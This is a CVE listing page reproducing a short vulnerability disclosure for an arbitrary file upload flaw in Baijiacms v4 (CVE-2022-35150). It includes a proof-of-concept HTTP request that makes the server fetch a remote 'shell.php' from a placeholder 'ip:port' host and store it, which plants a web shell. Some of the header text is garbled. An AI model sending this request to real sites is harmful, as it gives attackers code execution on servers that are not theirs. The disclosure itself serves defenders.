Headline

CVE-2022-35150: CVE-Issues/upload_file.md at main · To-LingJing/CVE-Issues

Baijicms v4 was discovered to contain an arbitrary file upload vulnerability.

2 years ago

CVE

Open in Source

#vulnerability #web #windows #git #php #firefox

Permalink

Arbitrary file upload exists in Baijiacms

vendor：https://baijiacms.github.io/

download link：https://github.com/baijiacms/baijiacmsV4.git

Vulnerability trigger parameter:&url

The process of vulnerability discovery is as follows：

poc

GET
/CMS/baijiacms_v4_1_4_20170105/index.php?mod=site&act=public&do=file&op=fetch&url=http://ip:port/shell.php&status=1&beid=1 HTTP/1.1 
Host:127.0.0.1
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64;x64; rv:91.0) Gecko/20100101 Firefox/91.0 
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 
Accept-Language:zh-CN,zh;g=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 
Accept-Encoding: gzip, def late Gonnection: c lose 
Referer:
http://127.0.0.1/CMS/baijiacms_v4_1_4_20170105/index.php?mod=site&act=manager&do=dev&beid=1 
Cookie: PHPSESSID=n3Ig3p80u2sdcgbrdI7paj8145 
Upgrade-Insecure-Requests:1 
Sec-Fetch-Dest: document 
Sec-Fetch-Mode: navigate 
Sec-Fetch-Site: same-origin 
Sec-Fetch-User:?1

Files can be downloaded from a remote server and saved locally

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

1 year ago

1 year ago

1 year ago

1 year ago

1 year ago